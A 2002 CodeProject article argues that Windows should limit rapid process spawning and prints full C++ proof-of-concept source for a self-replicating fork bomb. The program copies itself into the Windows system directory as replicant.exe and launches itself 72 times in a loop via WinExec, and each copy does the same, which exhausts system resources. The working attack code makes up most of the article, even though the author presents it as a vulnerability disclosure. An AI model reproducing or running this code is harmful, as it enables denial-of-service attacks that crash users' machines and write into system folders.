Click here to Skip to main content
65,938 articles
CodeProject is changing. Read more.
Articles
(untagged)

Why Windows Should Have Tight Control Over The WinExec function

0.00/5 (No votes)
26 Jun 2002 1  
A brief description with proof of concept code detailing why finer execution control is needed with the Windows OS family.

Introduction

The Windows family is inherantly flawed in it's control of process execution on an OS global level. After discovering a rather nasty error in a recent program, I was able to determine that it is possible to enter into an EXTREME multiple replication condition within Windows which is similar to the Infinate Spawning Denial of Service attack that is able to be performed using some simple javascript containing a while loop under Internet Explorer 6 and all previous IE releases that incorporated javascript. This however uses native win32 code making it FAR more deadly in it's capability. When clocked during profiling phases, this application has a potential to be able to spawn 72 copies of itself per second. When this is coupled with the fact that per each instance of teh application executed, 72 more copies will be generated quickly consuming system resources. I have included the full source code for proof of concept. I have left the code in an uncompiled state so as to prevent accidental execution. Compile at your own risk. I invite your comments. Source code follows below.

#include "stdafx.h"


int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
 	
	// get the current module name and store it

	// in a char variable for later usage using

        // MAX_PATH to avoid a buffer overflow if a

        // windows installation happens to be store

        // in a deep level path name


	LPSTR lpThisModule = new TCHAR[MAX_PATH];
	
	GetModuleFileName(NULL, lpThisModule, MAX_PATH);
	
	// get the windows system path and store it

	// in a char variable for later usage using

        // MAX_PATH to avoid a buffer overflow if a

        // windows installation happens to be store

        // in a deep level path name



	LPSTR lpSystemPath = new TCHAR[MAX_PATH];
	
	GetSystemDirectory(lpSystemPath, MAX_PATH);
	
	// create a variable to hold the name of the 

	// destination module so that we can use the

	// strcat function to get a valid path name 

	// out of it for the CopyFile() function


	char szReplicantName[16] = "\\replicant.exe";
	
	strcat(lpSystemPath, szReplicantName);

	// copy ourselves into the system directory

	// using lpThisModule and lpSystemPath for

	// our module and system path locations

	
	CopyFile(lpThisModule, lpSystemPath, FALSE);
	
	// time to run and repeat the whole process

	// of replication from within the replicant

	// that we're about to execute.  Optimizied

	// variable sizes help keep the the loading

	// time low, but the repeated execution can

	// cause a RAPID resources drain on all but

	// the most beefed up systems...5184+ copys

	// of a application all desperate to run at

	// the same  time will do that to you...

	
	// setting up two integers to control the

	// execution of the loop that will actually

	// handle the replication of our executable

	
	int WhileLoopController = 1;
	
	int WhileLoopIterator = 0;

	while(WhileLoopController == 1)
	
	{
		
		WinExec(lpSystemPath, 0);
		
		WhileLoopIterator++;

			// not that this matters much after the

			// ball starts rolling, but it's being

			// included for the purposes of writing

			// complete and correct code as all loops

			// should contain some method to break out


			if( WhileLoopIterator >= 72 )
	
			{
				
				// setting the loop controller to 0

				// so we break from the while loop

				
				WhileLoopController = 0;

			}
	
	}

	return 0;

}
I find it fairly assinine that the microsoft os development teams have not added a facility to my knowledge to any windows os that prevents this rapid spawn condition from taking place. we're expected to pay out the wazoo for a solid OS, yet we get this. if anyone has any insight on ways to prevent this condition, I'd be interested in hearing them.

License

This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.

A list of licenses authors might use can be found here